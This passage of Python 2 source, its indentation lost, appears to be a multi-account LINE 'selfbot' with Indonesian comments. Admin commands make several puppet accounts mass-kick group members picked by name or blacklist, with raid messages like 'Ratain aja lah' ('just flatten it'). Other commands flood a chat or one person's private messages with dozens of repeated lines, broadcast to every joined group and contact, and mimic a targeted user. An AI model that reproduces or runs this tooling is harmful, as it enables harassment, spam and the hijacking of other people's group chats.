k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Pulang"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
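# Tag all: contentMetadata MENTION dirakit manual; "S"/"E" adalah offset karakter awal/akhir
# tiap "@nrik" di dalam msg.text, dan "M" adalah mid member yang di-mention.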
elif msg.text in ["Assalammualaikum"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Halo"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
# Kirim mention per 100 member agar tidak melebihi batas mention, tanpa melewati satu member pun
if jml > 500:
    cl.sendText(msg.to,'Member melebihi batas.')
else:
    for i in range(0, jml, 100):
        mention2(msg.to, nama[i:i+100])
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
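# Kill: cocokkan member grup dengan daftar blacklist, lalu kick yang cocok lewat bot acak.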
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Sikat" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Sikat","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah;")
msg.contentType = 13
# msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
if target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
#msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
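# Nk: kick member berdasarkan nama yang di-tag memakai bot induk.
# Hajar: akun "satpam" dimasukkan lewat ticket untuk menendang target, lalu ticket grup dikunci lagi.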
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
gs = cl.getGroup(msg.to)
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Hajar " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Hajar ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Jangan berharap")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
a = k1.getGroupIdsJoined()
a = k2.getGroupIdsJoined()
a = k3.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
k1.sendText(taf, (bctxt))
k2.sendText(taf, (bctxt))
k3.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot pulang"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
#cl.leaveGroup(i)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
kc.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
cl.sendText(msg.to,"★(☆─┅═ই╬BABANG_ADHI☆)(2 s★")
ki.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
kk.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
kc.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
ks.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k1.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k2.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k3.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k4.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
k5.sendText(msg.to,"★★(☆─┅═ই╬TRK ☆)(2s★★")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ Team Bonds Kills✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
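# Mimic: pesan teks dari user target dikirim ulang oleh bot-bot lain; sticker dibalas dengan
# sticker default (STKID 6) dan kontak (contentType 13) dikirim ulang apa adanya.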
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
k1.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
k1.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
